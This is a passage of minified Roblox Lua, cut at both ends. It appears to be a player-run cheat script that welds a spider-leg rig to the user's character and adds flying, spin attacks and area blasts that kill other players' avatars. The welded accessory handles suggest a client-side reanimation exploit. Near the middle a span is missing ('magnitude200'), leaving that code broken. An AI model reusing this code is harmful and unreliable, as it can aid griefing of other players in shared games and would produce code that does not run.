black")Part6.Rotation=Vector3.new(0,45,-21.2999992)Part6.CanCollide=false;Part6.Size=Vector3.new(5,1,1)Part6.CFrame=CFrame.new(34.6531296,4.73671198,8.06661797,0.65879637,0.2568883,0.707109034,-0.363295883,0.931675911,2.88365015e-07,-0.65879631,-0.256890744,0.707109392)Part6.BottomSurface=Enum.SurfaceType.Smooth;Part6.TopSurface=Enum.SurfaceType.Smooth;Part6.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part6.Position=Vector3.new(34.6531296,4.73671198,8.06661797)Part6.Orientation=Vector3.new(0,45,-21.2999992)Part6.Color=Color3.new(0.0666667,0.0666667,0.0666667)Motor6D7.Parent=Part6;Motor6D7.C0=CFrame.new(2.5999999,0,0,1,0,0,0,1,0,0,0,1)Motor6D7.C1=CFrame.new(5.10000038,-2.38418579e-07,0,1,0,0,0,1,0,0,0,1)Motor6D7.Part0=Part6;Motor6D7.Part1=Part8;Part8.Name="Knee"Part8.Parent=Model1;Part8.Material=Enum.Material.Neon;Part8.BrickColor=BrickColor.new("Really red")Part8.Rotation=Vector3.new(0,45,-21.2999992)Part8.CanCollide=false;Part8.Shape=Enum.PartType.Ball;Part8.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part8.CFrame=CFrame.new(33.0061378,5.6449523,9.71360874,0.65879637,0.2568883,0.707109034,-0.363295883,0.931675911,2.88365015e-07,-0.65879631,-0.256890744,0.707109392)Part8.BottomSurface=Enum.SurfaceType.Smooth;Part8.TopSurface=Enum.SurfaceType.Smooth;Part8.Color=Color3.new(1,0,0)Part8.Position=Vector3.new(33.0061378,5.6449523,9.71360874)Part8.Orientation=Vector3.new(0,45,-21.2999992)Part8.Color=Color3.new(1,0,0)Motor6D9.Name="Joint"Motor6D9.Parent=Part8;Motor6D9.C1=CFrame.new(-2.87059045,0.0170345306,0,0,-1,0,1,0,-0,0,0,1)Motor6D9.Part0=Part8;Motor6D9.Part1=Part2;Model10.Name="RightLowerLeg"Model10.Parent=Model0;Part11.Name="Leg"Part11.Parent=Model10;Part11.Material=Enum.Material.Metal;Part11.BrickColor=BrickColor.new("Really black")Part11.Rotation=Vector3.new(-180,45,68.6999969)Part11.CanCollide=false;Part11.Size=Vector3.new(6,1,1)Part11.CFrame=CFrame.new(42.8043213,2.97667575,10.493145,0.256888568,-0.658794105,0.707109451,-0.93167609,-0.363294035,1.54012838e-07,0.256888628,-0.658795714,-0.707108974)Part11.BottomSurface=Enum.SurfaceType.Smooth;Part11.TopSurface=Enum.SurfaceType.Smooth;Part11.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part11.Position=Vector3.new(42.8043213,2.97667575,10.493145)Part11.Orientation=Vector3.new(0,135,-111.299995)Part11.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part12.Name="Base"Part12.Parent=Model10;Part12.Material=Enum.Material.Neon;Part12.BrickColor=BrickColor.new("Really red")Part12.Transparency=1;Part12.Rotation=Vector3.new(-180,45,158.699997)Part12.CanCollide=false;Part12.Shape=Enum.PartType.Ball;Part12.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part12.CFrame=CFrame.new(38.7617035,3.82847738,6.45052004,-0.658794105,-0.256888568,0.707109451,-0.363294035,0.93167609,1.54012838e-07,-0.658795714,-0.256888628,-0.707108974)Part12.BottomSurface=Enum.SurfaceType.Smooth;Part12.TopSurface=Enum.SurfaceType.Smooth;Part12.Color=Color3.new(1,0,0)Part12.Position=Vector3.new(38.7617035,3.82847738,6.45052004)Part12.Orientation=Vector3.new(0,135,-21.2999992)Part12.Color=Color3.new(1,0,0)Motor6D13.Name="Joint"Motor6D13.Parent=Part12;Motor6D13.C0=CFrame.new(-5,0,0,1,0,0,0,1,0,0,0,1)Motor6D13.C1=CFrame.new(-2.49999809,1.43051147e-06,0,1,0,0,0,1,0,0,0,1)Motor6D13.Part0=Part12;Motor6D13.Part1=Part15;Motor6D14.Parent=Part12;Motor6D14.C1=CFrame.new(1.26169586,-0.671518087,0.450518131,-0.658792913,-0.256887645,0.707107306,-0.363293976,0.9316746,2.46838681e-07,-0.658793926,-0.256887645,-0.707106411)Motor6D14.Part0=Part12;Motor6D14.Part1=Part37;Part15.Name="Leg2"Part15.Parent=Model10;Part15.Material=Enum.Material.Metal;Part15.BrickColor=BrickColor.new("Really black")Part15.Rotation=Vector3.new(-180,45,158.699997)Part15.CanCollide=false;Part15.Size=Vector3.new(5,1,1)Part15.CFrame=CFrame.new(40.4086914,4.73671198,8.09751129,-0.658794105,-0.256888568,0.707109451,-0.363294035,0.93167609,1.54012838e-07,-0.658795714,-0.256888628,-0.707108974)Part15.BottomSurface=Enum.SurfaceType.Smooth;Part15.TopSurface=Enum.SurfaceType.Smooth;Part15.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part15.Position=Vector3.new(40.4086914,4.73671198,8.09751129)Part15.Orientation=Vector3.new(0,135,-21.2999992)Part15.Color=Color3.new(0.0666667,0.0666667,0.0666667)Motor6D16.Parent=Part15;Motor6D16.C0=CFrame.new(2.5999999,0,0,1,0,0,0,1,0,0,0,1)Motor6D16.C1=CFrame.new(5.10000038,-2.38418579e-07,0,1,0,0,0,1,0,0,0,1)Motor6D16.Part0=Part15;Motor6D16.Part1=Part17;Part17.Name="Knee"Part17.Parent=Model10;Part17.Material=Enum.Material.Neon;Part17.BrickColor=BrickColor.new("Really red")Part17.Rotation=Vector3.new(-180,45,158.699997)Part17.CanCollide=false;Part17.Shape=Enum.PartType.Ball;Part17.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part17.CFrame=CFrame.new(42.0556755,5.64494753,9.74450111,-0.658794105,-0.256888568,0.707109451,-0.363294035,0.93167609,1.54012838e-07,-0.658795714,-0.256888628,-0.707108974)Part17.BottomSurface=Enum.SurfaceType.Smooth;Part17.TopSurface=Enum.SurfaceType.Smooth;Part17.Color=Color3.new(1,0,0)Part17.Position=Vector3.new(42.0556755,5.64494753,9.74450111)Part17.Orientation=Vector3.new(0,135,-21.2999992)Part17.Color=Color3.new(1,0,0)Motor6D18.Name="Joint"Motor6D18.Parent=Part17;Motor6D18.C1=CFrame.new(-2.87059045,0.0170345306,0,0,-1,0,1,0,-0,0,0,1)Motor6D18.Part0=Part17;Motor6D18.Part1=Part11;Model19.Name="RightUpperLeg"Model19.Parent=Model0;Part20.Name="Leg"Part20.Parent=Model19;Part20.Material=Enum.Material.Metal;Part20.BrickColor=BrickColor.new("Really black")Part20.Rotation=Vector3.new(-180,-45,68.6999969)Part20.CanCollide=false;Part20.Size=Vector3.new(6,1,1)Part20.CFrame=CFrame.new(42.8043251,2.97667956,1.56864583,0.256889135,-0.658794999,-0.707108319,-0.931675553,-0.363295496,1.16880165e-06,-0.256889671,0.658795893,-0.707108676)Part20.BottomSurface=Enum.SurfaceType.Smooth;Part20.TopSurface=Enum.SurfaceType.Smooth;Part20.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part20.Position=Vector3.new(42.8043251,2.97667956,1.56864583)Part20.Orientation=Vector3.new(0,-135,-111.299995)Part20.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part21.Name="Base"Part21.Parent=Model19;Part21.Material=Enum.Material.Neon;Part21.BrickColor=BrickColor.new("Really red")Part21.Transparency=1;Part21.Rotation=Vector3.new(-180,-45,158.699997)Part21.CanCollide=false;Part21.Shape=Enum.PartType.Ball;Part21.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part21.CFrame=CFrame.new(38.7617035,3.82847285,5.61127424,-0.658794999,-0.256889135,-0.707108319,-0.363295496,0.931675553,1.16880165e-06,0.658795893,0.256889671,-0.707108676)Part21.BottomSurface=Enum.SurfaceType.Smooth;Part21.TopSurface=Enum.SurfaceType.Smooth;Part21.Color=Color3.new(1,0,0)Part21.Position=Vector3.new(38.7617035,3.82847285,5.61127424)Part21.Orientation=Vector3.new(0,-135,-21.2999992)Part21.Color=Color3.new(1,0,0)Motor6D22.Name="Joint"Motor6D22.Parent=Part21;Motor6D22.C0=CFrame.new(-5,0,0,1,0,0,0,1,0,0,0,1)Motor6D22.C1=CFrame.new(-2.49999809,1.43051147e-06,0,1,0,0,0,1,0,0,0,1)Motor6D22.Part0=Part21;Motor6D22.Part1=Part24;Motor6D23.Parent=Part21;Motor6D23.C1=CFrame.new(1.26169586,-0.671522856,-0.388725281,-0.658793211,-0.256887972,-0.707106888,-0.363295078,0.931674182,6.63038577e-07,0.65879339,0.256888986,-0.707106709)Motor6D23.Part0=Part21;Motor6D23.Part1=Part37;Part24.Name="Leg2"Part24.Parent=Model19;Part24.Material=Enum.Material.Metal;Part24.BrickColor=BrickColor.new("Really black")Part24.Rotation=Vector3.new(-180,-45,158.699997)Part24.CanCollide=false;Part24.Size=Vector3.new(5,1,1)Part24.CFrame=CFrame.new(40.4086914,4.73671103,3.96428299,-0.658794999,-0.256889135,-0.707108319,-0.363295496,0.931675553,1.16880165e-06,0.658795893,0.256889671,-0.707108676)Part24.BottomSurface=Enum.SurfaceType.Smooth;Part24.TopSurface=Enum.SurfaceType.Smooth;Part24.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part24.Position=Vector3.new(40.4086914,4.73671103,3.96428299)Part24.Orientation=Vector3.new(0,-135,-21.2999992)Part24.Color=Color3.new(0.0666667,0.0666667,0.0666667)Motor6D25.Parent=Part24;Motor6D25.C0=CFrame.new(2.5999999,0,0,1,0,0,0,1,0,0,0,1)Motor6D25.C1=CFrame.new(5.10000038,-2.38418579e-07,0,1,0,0,0,1,0,0,0,1)Motor6D25.Part0=Part24;Motor6D25.Part1=Part26;Part26.Name="Knee"Part26.Parent=Model19;Part26.Material=Enum.Material.Neon;Part26.BrickColor=BrickColor.new("Really red")Part26.Rotation=Vector3.new(-180,-45,158.699997)Part26.CanCollide=false;Part26.Shape=Enum.PartType.Ball;Part26.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part26.CFrame=CFrame.new(42.0556793,5.64494991,2.31729317,-0.658794999,-0.256889135,-0.707108319,-0.363295496,0.931675553,1.16880165e-06,0.658795893,0.256889671,-0.707108676)Part26.BottomSurface=Enum.SurfaceType.Smooth;Part26.TopSurface=Enum.SurfaceType.Smooth;Part26.Color=Color3.new(1,0,0)Part26.Position=Vector3.new(42.0556793,5.64494991,2.31729317)Part26.Orientation=Vector3.new(0,-135,-21.2999992)Part26.Color=Color3.new(1,0,0)Motor6D27.Name="Joint"Motor6D27.Parent=Part26;Motor6D27.C1=CFrame.new(-2.87059045,0.0170345306,0,0,-1,0,1,0,-0,0,0,1)Motor6D27.Part0=Part26;Motor6D27.Part1=Part20;Model28.Name="LeftUpperLeg"Model28.Parent=Model0;Part29.Name="Leg"Part29.Parent=Model28;Part29.Material=Enum.Material.Metal;Part29.BrickColor=BrickColor.new("Really black")Part29.Rotation=Vector3.new(0,-45,-111.299995)Part29.CanCollide=false;Part29.Size=Vector3.new(6,1,1)Part29.CFrame=CFrame.new(32.2575073,2.97668052,1.53776193,-0.256887734,0.658793867,-0.70710808,-0.931674898,-0.363295287,-5.81522841e-07,-0.256888896,0.658794224,0.707108021)Part29.BottomSurface=Enum.SurfaceType.Smooth;Part29.TopSurface=Enum.SurfaceType.Smooth;Part29.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part29.Position=Vector3.new(32.2575073,2.97668052,1.53776193)Part29.Orientation=Vector3.new(0,-45,-111.299995)Part29.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part30.Name="Base"Part30.Parent=Model28;Part30.Material=Enum.Material.Neon;Part30.BrickColor=BrickColor.new("Really red")Part30.Transparency=1;Part30.Rotation=Vector3.new(0,-45,-21.2999992)Part30.CanCollide=false;Part30.Shape=Enum.PartType.Ball;Part30.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part30.CFrame=CFrame.new(36.3001213,3.82847309,5.58037996,0.658793867,0.256887734,-0.70710808,-0.363295287,0.931674898,-5.81522841e-07,0.658794224,0.256888896,0.707108021)Part30.BottomSurface=Enum.SurfaceType.Smooth;Part30.TopSurface=Enum.SurfaceType.Smooth;Part30.Color=Color3.new(1,0,0)Part30.Position=Vector3.new(36.3001213,3.82847309,5.58037996)Part30.Orientation=Vector3.new(0,-45,-21.2999992)Part30.Color=Color3.new(1,0,0)Motor6D31.Name="Joint"Motor6D31.Parent=Part30;Motor6D31.C0=CFrame.new(-5,0,0,1,0,0,0,1,0,0,0,1)Motor6D31.C1=CFrame.new(-2.49999809,1.43051147e-06,0,1,0,0,0,1,0,0,0,1)Motor6D31.Part0=Part30;Motor6D31.Part1=Part33;Motor6D32.Parent=Part30;Motor6D32.C1=CFrame.new(-1.19987869,-0.671523809,-0.419620514,0.658793986,0.256887794,-0.707107961,-0.363295197,0.931674778,-5.81522897e-07,0.658794165,0.256888896,0.707107723)Motor6D32.Part0=Part30;Motor6D32.Part1=Part37;Part33.Name="Leg2"Part33.Parent=Model28;Part33.Material=Enum.Material.Metal;Part33.BrickColor=BrickColor.new("Really black")Part33.Rotation=Vector3.new(0,-45,-21.2999992)Part33.CanCollide=false;Part33.Size=Vector3.new(5,1,1)Part33.CFrame=CFrame.new(34.6531334,4.73671055,3.93339276,0.658793867,0.256887734,-0.70710808,-0.363295287,0.931674898,-5.81522841e-07,0.658794224,0.256888896,0.707108021)Part33.BottomSurface=Enum.SurfaceType.Smooth;Part33.TopSurface=Enum.SurfaceType.Smooth;Part33.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part33.Position=Vector3.new(34.6531334,4.73671055,3.93339276)Part33.Orientation=Vector3.new(0,-45,-21.2999992)Part33.Color=Color3.new(0.0666667,0.0666667,0.0666667)Motor6D34.Parent=Part33;Motor6D34.C0=CFrame.new(2.5999999,0,0,1,0,0,0,1,0,0,0,1)Motor6D34.C1=CFrame.new(5.10000038,-2.38418579e-07,0,1,0,0,0,1,0,0,0,1)Motor6D34.Part0=Part33;Motor6D34.Part1=Part35;Part35.Name="Knee"Part35.Parent=Model28;Part35.Material=Enum.Material.Neon;Part35.BrickColor=BrickColor.new("Really red")Part35.Rotation=Vector3.new(0,-45,-21.2999992)Part35.CanCollide=false;Part35.Shape=Enum.PartType.Ball;Part35.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part35.CFrame=CFrame.new(33.0061493,5.64494896,2.28640699,0.658793867,0.256887734,-0.70710808,-0.363295287,0.931674898,-5.81522841e-07,0.658794224,0.256888896,0.707108021)Part35.BottomSurface=Enum.SurfaceType.Smooth;Part35.TopSurface=Enum.SurfaceType.Smooth;Part35.Color=Color3.new(1,0,0)Part35.Position=Vector3.new(33.0061493,5.64494896,2.28640699)Part35.Orientation=Vector3.new(0,-45,-21.2999992)Part35.Color=Color3.new(1,0,0)Motor6D36.Name="Joint"Motor6D36.Parent=Part35;Motor6D36.C1=CFrame.new(-2.87059045,0.0170345306,0,0,-1,0,1,0,-0,0,0,1)Motor6D36.Part0=Part35;Motor6D36.Part1=Part29;Part37.Name="FakeTorso"Part37.Parent=Model0;Part37.Transparency=1;Part37.Size=Vector3.new(2,2,1)Part37.CFrame=CFrame.new(37.5000038,4.49999714,6.00000095,1.0000025,-4.23265476e-07,-4.76837158e-07,-4.2326559e-07,1.00000143,-2.91990006e-07,-4.17232513e-07,-2.77089043e-07,1.00000322)Part37.BottomSurface=Enum.SurfaceType.Smooth;Part37.TopSurface=Enum.SurfaceType.Smooth;Part37.Position=Vector3.new(37.5000038,4.49999714,6.00000095)Motor6D38.Name="Motor"Motor6D38.Parent=Part37;Motor6D38.Part0=Part37;for T,v in pairs(mas:GetChildren())do v.Parent=workspace;pcall(function()v:MakeJoints()end)end;mas:Destroy()for T,v in pairs(cors)do spawn(function()pcall(v)end)end;return Model0 end;local o4=CreateInstance()o4.Parent=char;for T,v in pairs(o4:GetDescendants())do if v:IsA("BasePart")then v.CustomPhysicalProperties=PhysicalProperties.new(0,0,0)end end;for T,v in pairs(char:GetDescendants())do if v:IsA("Sound")then v.Volume=0 end end;for T,v in pairs(o4:GetDescendants())do if v:IsA("BasePart")then if v.BrickColor==BrickColor.new("Really black")then v.Color=primary else v.Color=secondary end end end;function tween(o5,o6,gR,t,o7)local o8=game:GetService("TweenService")local o9=TweenInfo.new(t,Enum.EasingStyle[o6],Enum.EasingDirection[gR])local tween=o8:Create(o5,o9,o7)tween:Play()return tween end;local char=player.Character;torso=char.Torso;head=char.Head;hrp=char.HumanoidRootPart;hum=char.Humanoid;hum.WalkSpeed=20;s=0;rstep=game:GetService("RunService").RenderStepped;if char:FindFirstChild("Animate")then char.Animate:Destroy()end;for T,v in pairs(hum:GetPlayingAnimationTracks())do v:Stop()end;local gu=torso['Right Hip']local oa=torso['Left Hip']local rs=torso['Right Shoulder']local ls=torso['Left Shoulder']local ob=torso.Neck;local oc=rs.C0;local od=ls.C0;local oe=gu.C0;local of=oa.C0;local og=ob.C0;function newSound(eq,oh)local oi=basesound:Clone()if not oi then oi=Instance.new("Sound")end;oi.Parent=hrp;oi.Volume=1;oi.SoundId=eq;if oh then for T=1,#oh do local oj=oh[T]:gmatch("[%w%.]+")local ok={}for v in oj do table.insert(ok,v)end;oi[ok[1]]=ok[2]end end;oi.Playing=true;game.Debris:AddItem(oi,5)return oi end;function woosh()local ol={'rbxassetid://541909867','rbxassetid://541909814'}return newSound(ol[math.random(1,#ol)],{[1]="PlaybackSpeed, "..tostring(1+math.random(-200,200)/1000),[2]="Volume, 1",[3]="PlaybackSpeed, 0.9"})end;function hardhit()local ol={'rbxassetid://565207203','rbxassetid://541909983','rbxassetid://541909913'}newSound(ol[math.random(1,#ol)],{[1]="PlaybackSpeed, "..tostring(1+math.random(-100,100)/1000),[2]="Volume, 2"})end;function explosion()local ol={'rbxassetid://262562442','rbxassetid://919941001','rbxassetid://539294959'}newSound(ol[math.random(1,#ol)],{[1]="PlaybackSpeed, "..tostring(1+math.random(-100,100)/1000),[2]="Volume, 2"})end;function hit()local om={"rbxassetid://220025741","rbxassetid://220025689","rbxassetid://220025689"}return newSound(om[math.random(1,#om)],{[1]="PlaybackSpeed, "..tostring(1+math.random(-200,200)/1000),[2]="Volume, 0.5"})end;local oo=0;rstep:connect(function()if not flying then oo=oo+0.025;local op=math.sin(oo)gu.C0=gu.C0:lerp(oe*CFrame.Angles(op/25+math.rad(-2),0,0),0.2)oa.C0=oa.C0:lerp(of*CFrame.Angles(op/25+math.rad(-2),0,0),0.2)rs.C0=rs.C0:lerp(oc*CFrame.Angles(-op/15+math.rad(-6),0,0),0.2)ls.C0=ls.C0:lerp(od*CFrame.Angles(-op/15+math.rad(-6),0,0),0.2)ob.C0=ob.C0:lerp(og*CFrame.Angles(op/15+math.rad(15),0,0),0.2)else oo=oo+0.025;local op=math.sin(oo)gu.C0=gu.C0:lerp(oe*CFrame.Angles(op/25+math.rad(-2),0,0),0.2)oa.C0=oa.C0:lerp(of*CFrame.Angles(op/25+math.rad(-2),0,0),0.2)rs.C0=rs.C0:lerp(oc*CFrame.Angles(-op/10+math.rad(-90),0,0)*CFrame.new(0,-0.5,-0.5),0.2)ls.C0=ls.C0:lerp(od*CFrame.Angles(-op/10+math.rad(-90),0,0)*CFrame.new(0,-0.5,-0.5),0.2)ob.C0=ob.C0:lerp(og*CFrame.Angles(op/15+math.rad(5),0,0),0.2)end end)hum.HipHeight=1.25;center=o4.FakeTorso;cmotor=center.Motor;cmotor.Part1=torso;LLL=o4.LeftLowerLeg;LUL=o4.LeftUpperLeg;RLL=o4.RightLowerLeg;RUL=o4.RightUpperLeg;lll=LLL.Base.Motor6D;lul=LUL.Base.Motor6D;rll=RLL.Base.Motor6D;rul=RUL.Base.Motor6D;lll2=LLL.Knee.Joint;lul2=LUL.Knee.Joint;rll2=RLL.Knee.Joint;rul2=RUL.Knee.Joint;olll=lll.C0*CFrame.new(-0.5,0,-1)*CFrame.new(-0.3,-0.75,0.3)olul=lul.C0*CFrame.new(-0.5,0,1)*CFrame.new(-0.3,-0.75,-0.3)orll=rll.C0*CFrame.new(-0.5,0,1)*CFrame.new(-0.3,-0.75,-0.3)orul=rul.C0*CFrame.new(-0.5,0,-1)*CFrame.new(-0.3,-0.75,0.3)lll2.C0=lll2.C0;lul2.C0=lul2.C0;rll2.C0=rll2.C0;rul2.C0=rul2.C0;olll2=lll2.C0;olul2=lul2.C0;orll2=rll2.C0;orul2=rul2.C0;rstep:connect(function()local v=torso.Velocity;local gO=math.sqrt(v.x^2+v.z^2)/15;s=gO*15;if gO>0.1 then pose="Running"else pose="Idle"end end)pose="Idle"local oq=1;local ot=-1;local ou=2.7;local ov=-2.7;hum.JumpPower=0;movelegs=true;flying=false;bv=Instance.new("BodyVelocity",torso)function sparkle(ow,ox,pos,oy,oz)for T=1,ox do if oz==nil then oz=ow/9 end;local p=basepart:Clone()p.Parent=workspace;p.CanCollide=false;p.Shape="Ball"p.Position=Vector3.new(1000,1000,1000)p.Anchored=true;p.Material="Neon"p.Color=secondary;p.CFrame=CFrame.new(pos)*CFrame.Angles(math.random(-360,360)/360,math.random(-360,360)/360,math.random(-360,360)/360)p.Size=Vector3.new(1,1,1)local V=Instance.new("SpecialMesh",p)V.MeshType=Enum.MeshType.Sphere;tween(p,"Sine","Out",oy,{["Transparency"]=1,["CFrame"]=p.CFrame*CFrame.Angles(math.random(-360,360)/360,math.random(-360,360)/360,math.random(-360,360)/360)})tween(V,"Sine","Out",oy*2,{["Scale"]=Vector3.new(oz,ow*10,oz)})game.Debris:AddItem(p,oy)end end;sparkle(10,55,hrp.Position,3,1)function push(ec,oA)local oB=Instance.new("BodyVelocity",ec)oB.Velocity=(ec.Position-torso.Position).unit*3*oA/30000;oB.MaxForce=Vector3.new(oA,oA,oA)game.Debris:AddItem(oB,0.25)end;local t={}function t.find(oC,oD)for T=1,#oC do if oC[T]==oD then return true end end;return false end;function AOE(oE,je,pos)coroutine.resume(coroutine.create(function()if not pos then pos=hrp.Position end;local oF={}local oG=baseexplosion:Clone()oG.Position=pos;oG.Parent=workspace;oG.BlastPressure=0;oG.Visible=false;oG.DestroyJointRadiusPercent=0;oG.BlastRadius=oE;oG.Hit:connect(function(oH)if oH.Parent:FindFirstChildOfClass("Humanoid")and oH.Parent~=char and t.find(oF,oH.Parent)==false then table.insert(oF,oH.Parent)end;if oH.Parent:FindFirstChildOfClass("Humanoid")and oH.Parent~=char then push(oH,je*0)end end)local p=basepart:Clone()p.Parent=workspace;p.Shape="Ball"p.Anchored=true;p.CanCollide=false;p.Material="Neon"p.Color=secondary;p.CFrame=CFrame.new(pos)p.Size=Vector3.new(0,0,0)tween(p,"Sine","Out",2,{["Size"]=Vector3.new(oE*5,oE*5,oE*5)})tween(p,"Sine","Out",0.75,{["Transparency"]=1})game.Debris:AddItem(p,0.75)spawn(function()sparkle(oE,15,p.Position,1)end)wait()for T=1,#oF do local oI=oF[T]:FindFirstChildOfClass("Part")if oI then local oJ=oF[T]:FindFirstChildOfClass("Humanoid")if oJ and oJ~=hum then oJ.Health=oJ.Health-oJ.MaxHealth/(100/0)if oJ.MaxHealth==math.huge then oF[T]:BreakJoints()end end end end end))end;function AOE2(oE,je,pos)if not pos then pos=hrp.Position end;local oF={}local oG=baseexplosion:Clone()oG.Position=pos;oG.Parent=Character;oG.BlastPressure=0;oG.Visible=false;oG.DestroyJointRadiusPercent=0;oG.BlastRadius=oE;oG.Hit:connect(function(oH)if oH.Parent:FindFirstChildOfClass("Humanoid")and oH.Parent~=char and t.find(oF,oH.Parent)==false then table.insert(oF,oH.Parent)end;if oH.Parent:FindFirstChildOfClass("Humanoid")and oH.Parent~=char then push(oH,je*0)end end)wait()for T=1,#oF do if oF[T]~=char then local oI=oF[T]:FindFirstChild("HumanoidRootPart")if oI then if(oI.Position-pos).magnitude200 then oV=200 end;if oV>150 then hardhit()hardhit()woosh()woosh()sparkle(5,30,(torso.CFrame*CFrame.new(0,-2,0)).p,1.5)end;bv.Velocity=Vector3.new(0,oV,0)bv.MaxForce=Vector3.new(0,4000000,0)end)tween(hum,"Sine","Out",0.1,{["HipHeight"]=1.25})woosh()tween(lll,"Sine","Out",0.25,{["C0"]=olll*CFrame.Angles(0,0,-math.rad(50))})tween(lul,"Sine","Out",0.25,{["C0"]=olul*CFrame.Angles(0,0,-math.rad(50))})tween(rll,"Sine","Out",0.25,{["C0"]=orll*CFrame.Angles(0,0,-math.rad(50))})tween(rul,"Sine","Out",0.25,{["C0"]=orul*CFrame.Angles(0,0,-math.rad(50))})tween(lll2,"Sine","InOut",0.25,{["C0"]=olll2*CFrame.Angles(0,0,-math.rad(30))})tween(lul2,"Sine","InOut",0.25,{["C0"]=olul2*CFrame.Angles(0,0,-math.rad(30))})tween(rll2,"Sine","InOut",0.25,{["C0"]=orll2*CFrame.Angles(0,0,-math.rad(30))})tween(rul2,"Sine","InOut",0.25,{["C0"]=orul2*CFrame.Angles(0,0,-math.rad(30))})tween(hum,"Sine","Out",0.2,{["WalkSpeed"]=25})wait(0.15)movelegs=true;spawn(function()repeat rstep:Wait(0)tween(hum,"Sine","Out",3,{["WalkSpeed"]=100})until hum.FloorMaterial~=Enum.Material.Air;if oV>150 and oU then AOE(15,99,hrp.Position-Vector3.new(0,2,0))explosion()explosion()hardhit()sparkle(15,45,torso.Position-Vector3.new(0,5,0),1,10)end;editws=true end)end;cm0=cmotor.C0;function unravel()tween(lll,"Sine","Out",0.1,{["C0"]=CFrame.new(-1,-0.5,-0.5)*CFrame.Angles(0,0,-0.3)})tween(lul,"Sine","Out",0.1,{["C0"]=CFrame.new(-1,-0.5,0.5)*CFrame.Angles(0,0,-0.3)})tween(rll,"Sine","Out",0.1,{["C0"]=CFrame.new(-1,-0.5,0.5)*CFrame.Angles(0,0,-0.3)})tween(rul,"Sine","Out",0.1,{["C0"]=CFrame.new(-1,-0.5,-0.5)*CFrame.Angles(0,0,-0.3)})tween(lll2,"Sine","Out",0.1,{["C0"]=olll2*CFrame.Angles(0,0,math.rad(-90))})tween(lul2,"Sine","Out",0.1,{["C0"]=olul2*CFrame.Angles(0,0,math.rad(-90))})tween(rll2,"Sine","Out",0.1,{["C0"]=orll2*CFrame.Angles(0,0,math.rad(-90))})tween(rul2,"Sine","Out",0.1,{["C0"]=orul2*CFrame.Angles(0,0,math.rad(-90))})end;function spin()if attacking then return end;flying=true;attacking=true;movelegs=false;tween(hum,"Sine","InOut",0.2,{["WalkSpeed"]=0})repeat movelegs=false;unravel()if fdown==false then flying=false end;hum.HipHeight=1+math.sin(oo)/2;rstep:Wait(0)rstep:Wait(0)rstep:Wait(0)bv.MaxForce=Vector3.new(0,2000,0)bv.Velocity=Vector3.new(0,50,0)local t=tween(cmotor,"Sine","Out",0.15,{["C0"]=cmotor.C0*CFrame.Angles(0,2,0)})local oW=woosh()oW.Volume=0.02;oW.PlaybackSpeed=oW.PlaybackSpeed-0.2;spawn(function()AOE2(15,3,hrp.CFrame.p)end)until fdown==false;bv.MaxForce=Vector3.new(0,0,0)tween(cmotor,"Sine","Out",0.5,{["C0"]=cm0})movelegs=true;attacking=false;flying=false end;function base()if flying or attacking then return end;attacking=true;editws=false;movelegs=false;tween(hum,"Sine","InOut",0.2,{["WalkSpeed"]=0})woosh()tween(lll,"Sine","InOut",0.2,{["C0"]=olll*CFrame.Angles(0,0,0)})tween(lul,"Sine","InOut",0.2,{["C0"]=olul})tween(rll,"Sine","InOut",0.2,{["C0"]=orll*CFrame.Angles(0,0,0)})tween(rul,"Sine","InOut",0.2,{["C0"]=orul})tween(lll2,"Sine","InOut",0.2,{["C0"]=olll2*CFrame.Angles(0,0,0)})tween(lul2,"Sine","InOut",0.2,{["C0"]=olul2*CFrame.Angles(0,0,0)})tween(rll2,"Sine","InOut",0.2,{["C0"]=orll2*CFrame.Angles(0,0,0)})tween(rul2,"Sine","InOut",0.2,{["C0"]=orul2*CFrame.Angles(0,0,0)})wait(0.2)spawn(function()wait(0.08)hardhit()AOE2(5,20,(hrp.CFrame*CFrame.new(0,-3,5)).p)end)wait(0.15)movelegs=true;attacking=false;editws=true end;W(R.one.Handle,Character.Bot.LeftLowerLeg.Leg)W(R.two.Handle,Character.Bot.LeftLowerLeg.Leg2)W(R.joint.Handle,Character.Bot.LeftUpperLeg.Knee)W(R.three.Handle,Character.Bot.RightLowerLeg.Leg)W(R.four.Handle,Character.Bot.RightLowerLeg.Leg2)W(R.joint1.Handle,Character.Bot.RightUpperLeg.Knee)W(R.five.Handle,Character.Bot.RightUpperLeg.Leg)W(R.six.Handle,Character.Bot.RightUpperLeg.Leg2)W(R.seven.Handle,Character.Bot.LeftUpperLeg.Leg)W(R.eight.Handle,Character.Bot.LeftUpperLeg.Leg2)R.one.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.two.Handle.Attachment.Rotation=Vector3.new(0,0,90)R.three.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.four.Handle.Attachment.Rotation=Vector3.new(0,0,90)R.five.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.six.Handle.Attachment.Rotation=Vector3.new(0,0,90)R.seven.Handle.Attachment.Rotation=Vector3.new(0,0,90)R.eight.Handle.Attachment.Rotation=Vector3.new(0,0,90)Character.Bot.LeftLowerLeg.Leg.Transparency=1;Character.Bot.LeftLowerLeg.Base.Transparency=1;Character.Bot.LeftLowerLeg.Leg2.Transparency=1;Character.Bot.LeftLowerLeg.Knee.Transparency=1;Character.Bot.RightLowerLeg.Leg.Transparency=1;Character.Bot.RightLowerLeg.Base.Transparency=1;Character.Bot.RightLowerLeg.Leg2.Transparency=1;Character.Bot.RightLowerLeg.Knee.Transparency=1;Character.Bot.RightUpperLeg.Leg.Transparency=1;Character.Bot.RightUpperLeg.Base.Transparency=1;Character.Bot.RightUpperLeg.Leg2.Transparency=1;Character.Bot.RightUpperLeg.Knee.Transparency=1;Character.Bot.Left